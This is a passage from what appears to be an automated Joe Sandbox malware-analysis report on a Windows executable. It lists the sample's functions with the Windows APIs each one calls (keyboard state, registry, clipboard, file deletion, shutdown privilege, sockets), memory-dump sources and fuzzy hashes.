                    Function 00C86843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                    • API String ID: 0-4052911093
                    • Opcode ID: c5b373d4d162b3e8bc29b89b141f256d4967b2b540d0e095656bab759ad5af0d
                    • Instruction ID: 5c766b8313f539a04c20f37fbc23ec290cb036247c5d54bd1797ee61ba64493a
                    • Opcode Fuzzy Hash: c5b373d4d162b3e8bc29b89b141f256d4967b2b540d0e095656bab759ad5af0d
                    • Instruction Fuzzy Hash: F072B171E00219DBDB14DF5AC880BAEB7B5FF49314F14806AE819EB381DB309E81DB94
                    Function 00CF0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0737
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CF07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CF086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CF0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: d8d0cabdf86e11f009ccfbea95db5419af490e8abec965749ccc56bb95fa024e
                    • Instruction ID: 63f3c2cad20b7decf942a8f967800d0ea3a55a53165a9513ac18c044fd4102ab
                    • Opcode Fuzzy Hash: d8d0cabdf86e11f009ccfbea95db5419af490e8abec965749ccc56bb95fa024e
                    • Instruction Fuzzy Hash: ADE15C31204304AFCB54DF25C885E2ABBE9EF89714B14856DF95ADB2A2DB30ED01DB52
                    Function 00CD0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00CD0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 00CD02C2
                    • GetKeyState.USER32(000000A0), ref: 00CD02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 00CD02F7
                    • GetKeyState.USER32(000000A1), ref: 00CD030C
                    • GetAsyncKeyState.USER32(00000011), ref: 00CD0324
                    • GetKeyState.USER32(00000011), ref: 00CD0336
                    • GetAsyncKeyState.USER32(00000012), ref: 00CD034E
                    • GetKeyState.USER32(00000012), ref: 00CD0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 00CD0378
                    • GetKeyState.USER32(0000005B), ref: 00CD038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 6e760020e88896aaae90347eb20ee73f9aace96241485b21dd63b5fee905caad
                    • Instruction ID: 2a5ad6a2b845b2817598e2f405c999cb5f10cbbf5b7a47cffcd00c7d6fc37124
                    • Opcode Fuzzy Hash: 6e760020e88896aaae90347eb20ee73f9aace96241485b21dd63b5fee905caad
                    • Instruction Fuzzy Hash: D541A9245057C96EFF319A6888483B9BEA0AF11340F68409FD7D6477D2E7D49BC8C7A2
                    Function 00CE4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 7cc3d873a9d9d4a134740d55a066b3e5fa06c312961c83842887caccc161e804
                    • Instruction ID: fb5d2c28a1ca483fbf078c9ffb0f3b010abdadb28ceb12aed14df15b85e61a67
                    • Opcode Fuzzy Hash: 7cc3d873a9d9d4a134740d55a066b3e5fa06c312961c83842887caccc161e804
                    • Instruction Fuzzy Hash: 6A217F35301211AFDB14AF65EC49B7E77A8EF44721F10C02AF94ADB2A1CB74AD01DB5A
                    Function 00CD3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C748A1,?,?,00C737C0,?), ref: 00C748CE
                      • Part of subcall function 00CD4CD3: GetFileAttributesW.KERNEL32(?,00CD3947), ref: 00CD4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 00CD3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CD3B87
                    • MoveFileW.KERNEL32(?,?), ref: 00CD3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CD3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CD3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 7674ffe4cc754295ab75fec1d932e99ebe103806d52c51e0fac9f61d980f2eaa
                    • Instruction ID: 30ed32279cf854d0d256d1129a97df7d67361d78c90f46e1c0b71dfcb15681cc
                    • Opcode Fuzzy Hash: 7674ffe4cc754295ab75fec1d932e99ebe103806d52c51e0fac9f61d980f2eaa
                    • Instruction Fuzzy Hash: ED51703180114CABCF15EBA0CD929FDB7B8AF14300F6481AAE55677191DF716F09EBA1
                    Function 00CDF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CDF6AB
                    • Sleep.KERNEL32(0000000A), ref: 00CDF6DB
                    • _wcscmp.LIBCMT ref: 00CDF6EF
                    • _wcscmp.LIBCMT ref: 00CDF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 00CDF7A8
                    • FindClose.KERNEL32(00000000), ref: 00CDF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 197f7f95c9d6c869a494ab8befcfc5a47f87a4003396bbb53d90b5010ee5b45f
                    • Instruction ID: eda302fd187def0d968cc2a2e9da1c17a152ba53cbe53f13a01d3d01b1e34377
                    • Opcode Fuzzy Hash: 197f7f95c9d6c869a494ab8befcfc5a47f87a4003396bbb53d90b5010ee5b45f
                    • Instruction Fuzzy Hash: E641607190021A9FCF11DF64CC89AEEBBB4FF05310F14456AE929A62A1DB309F46DB90
                    Function 00CFD74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • GetSystemMetrics.USER32(0000000F), ref: 00CFD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 00CFD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CFD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CFDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CFDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 00CFDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CFDA68
                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00CFDA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                    • String ID:
                    • API String ID: 830902736-0
                    • Opcode ID: 2de00919f3f298c4bc191614a2b4f412a9a693c81d38e06b2e6f61a241792664
                    • Instruction ID: 89f22d1deed2ca62cb8778ede01a24d2692288dfa1d24e25130115523895c52e
                    • Opcode Fuzzy Hash: 2de00919f3f298c4bc191614a2b4f412a9a693c81d38e06b2e6f61a241792664
                    • Instruction Fuzzy Hash: D7B1BB31500219EBCF54CF68C9C57BD7BB2FF04701F088069EE5A9B295DB30AA50DBA2
                    Function 00C84140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-1546025612
                    • Opcode ID: acb1fdbb4f8ae24c14d8721fd363a19faae4aee7f6f19622583a62faa769907c
                    • Instruction ID: fafa1babf9c73b6bcda15cef31be200da537c9f710ecb28753bb072f3f994ab7
                    • Opcode Fuzzy Hash: acb1fdbb4f8ae24c14d8721fd363a19faae4aee7f6f19622583a62faa769907c
                    • Instruction Fuzzy Hash: E1A28070E0421ACBDF28DF59C9807EDB7B1BF54318F1482AAD866A7280E7349E85DF54
                    Function 00C858C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 14f1495c1bb13178f4e175acdb1d4b01662fa368362e1077ab394dd07efb6f13
                    • Instruction ID: 0180a51d912d52ab74f0410c93288733c4188f5b8f7195a88821710e4bc1f301
                    • Opcode Fuzzy Hash: 14f1495c1bb13178f4e175acdb1d4b01662fa368362e1077ab394dd07efb6f13
                    • Instruction Fuzzy Hash: 3E12BB70A00609DFCF14DFA5D985AEEB3B5FF48304F208169E406E7290EB36AE15DB64
                    Function 00CFC27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C72344: GetCursorPos.USER32(?), ref: 00C72357
                      • Part of subcall function 00C72344: ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000001), ref: 00C72399
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    • ReleaseCapture.USER32 ref: 00CFC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 00CFC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CFC3AD
                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00CFC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 973565025-2107944366
                    • Opcode ID: ae3140d2cd106029fad4ad5ac186f876171c00e7de820880db534ef2b0e22f99
                    • Instruction ID: 894df80432f767e4e5b3bcf23a23bccdeb635e4ac7fd04aae7bec9ea1bef7f60
                    • Opcode Fuzzy Hash: ae3140d2cd106029fad4ad5ac186f876171c00e7de820880db534ef2b0e22f99
                    • Instruction Fuzzy Hash: 1C517B70204308AFD714DF24C896F7A7BE5EF88310F10852DF6A58B2E1CB71A959DB62
                    Function 00CD545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
                      • Part of subcall function 00CC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
                      • Part of subcall function 00CC8CC3: GetLastError.KERNEL32 ref: 00CC8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 00CD549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 86dc829b910883d08b9370f7eff1328a5de31aa674a105b3e86938d6d7dd297f
                    • Instruction ID: 7d4d63d40170e8ff5f2710f52f42ed01fb3bb20b206c58e88ef2f1dd9c71a80e
                    • Opcode Fuzzy Hash: 86dc829b910883d08b9370f7eff1328a5de31aa674a105b3e86938d6d7dd297f
                    • Instruction Fuzzy Hash: 4A01F731655A156BE7285678EC4AFBB7258EB04352F240127FE26E22D2DA505D8081A3
                    Function 00CE6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00CE65EF
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE65FE
                    • bind.WS2_32(00000000,?,00000010), ref: 00CE661A
                    • listen.WS2_32(00000000,00000005), ref: 00CE6629
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6643
                    • closesocket.WS2_32(00000000), ref: 00CE6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 9d00203acfbe8940704b8223a38a292893563569a21ad71b14597ac3c9dd3b94
                    • Instruction ID: 12d60170cf7241f2e04da9fa73b3d6b086e0851ae7639ac4b4f1c178f495d17c
                    • Opcode Fuzzy Hash: 9d00203acfbe8940704b8223a38a292893563569a21ad71b14597ac3c9dd3b94
                    • Instruction Fuzzy Hash: 2D219E312102009FDB10AF25C889B7EB7B9EF45360F148169F96AA73D1CB70AD01EB51
                    Function 00C85680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                    • _memmove.LIBCMT ref: 00CC062F
                    • _memmove.LIBCMT ref: 00CC0744
                    • _memmove.LIBCMT ref: 00CC07EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID:
                    • API String ID: 1300846289-0
                    • Opcode ID: 76bfc0f7e2d02b04ff91be17c9116897bdcbd9588d5a83bb228707c83040827d
                    • Instruction ID: 273aaca7108bd678847e30fc5536441c6a35f12a043b409a2ffb7e7229aa57b0
                    • Opcode Fuzzy Hash: 76bfc0f7e2d02b04ff91be17c9116897bdcbd9588d5a83bb228707c83040827d
                    • Instruction Fuzzy Hash: 8802A070E00209DFCF04DF65D985AAEBBB5FF44300F2480A9E80ADB295EB31DA55DB95
                    Function 00C71287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00C719FA
                    • GetSysColor.USER32(0000000F), ref: 00C71A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00C71A61
                      • Part of subcall function 00C71290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00C712D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ColorDialogNtdllProc_$LongWindow
                    • String ID:
                    • API String ID: 591255283-0
                    • Opcode ID: dacc055f07219a008b77ff2d16c331b98f70b35ac861656ad754c34148cfc3f7
                    • Instruction ID: 65fd40f84d1a1f71576af9cacda1bfa6fb8d7167f45a7961409dd983755163e9
                    • Opcode Fuzzy Hash: dacc055f07219a008b77ff2d16c331b98f70b35ac861656ad754c34148cfc3f7
                    • Instruction Fuzzy Hash: 16A16B70105549BFD628AB2E5C84EBF355DDF423A9B1CC11AFD1AD61D2DA10CE01F272
                    Function 00CE6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CE80A0: inet_addr.WS2_32(00000000), ref: 00CE80CB
                    • socket.WS2_32(00000002,00000002,00000011), ref: 00CE6AB1
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6ADA
                    • bind.WS2_32(00000000,?,00000010), ref: 00CE6B13
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6B20
                    • closesocket.WS2_32(00000000), ref: 00CE6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
